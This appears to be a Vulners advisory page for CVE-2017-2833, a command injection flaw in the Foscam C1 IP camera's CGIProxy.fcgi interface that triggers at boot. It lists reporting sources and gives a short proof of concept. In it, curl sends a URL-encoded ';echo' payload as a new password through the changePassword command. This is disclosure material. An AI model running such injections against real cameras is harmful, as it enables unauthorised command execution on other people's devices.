Foscam IP Video Camera CGIProxy.fcgi FTP Startup Configuration Command Injection Vulnerability(CVE-2017-2833) - Command injection vulnerability allows arbitrary shell characters resulting in command injection during boot proces
Reporter | Title | Published | Views | Family All 6 |
---|---|---|---|---|
Talos | Foscam IP Video Camera CGIProxy.fcgi FTP Startup Configuration Command Injection Vulnerability | 19 Jun 201700:00 | – | talos |
NVD | CVE-2017-2833 | 24 Apr 201819:29 | – | nvd |
Cvelist | CVE-2017-2833 | 24 Apr 201819:00 | – | cvelist |
Prion | Command injection | 24 Apr 201819:29 | – | prion |
CVE | CVE-2017-2833 | 24 Apr 201819:29 | – | cve |
Talos Blog | Vulnerability Spotlight: Multiple Foscam C1 Vulnerabilities Come in to Focus | 19 Jun 201708:45 | – | talosblog |
This vulnerability is reachable during the boot process. To trigger it, a command injection must be placed either in the username or in password field of the account. This can be done by the "changePassword" command, which requires a valid user account to change the password for:
```
$ sUsr="admin"
$ sPwd=""
$ sNewPwd=`perl -MURI::Escape -e 'print uri_escape(";echo y>/tmp/www/injected.txt")'`
$ curl "http://$SERVER/cgi-bin/CGIProxy.fcgi?usr=${sUsr}&pwd=${sPwd}&cmd=changePassword&usrName=${sUsr}&oldPwd=${sPwd}&newPwd=${sNewPwd}"
```
The device should then be rebooted using other means, and the command will be executed upon boot. Note that any command that alters username and password can be used, for example the "addAccount" command.
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo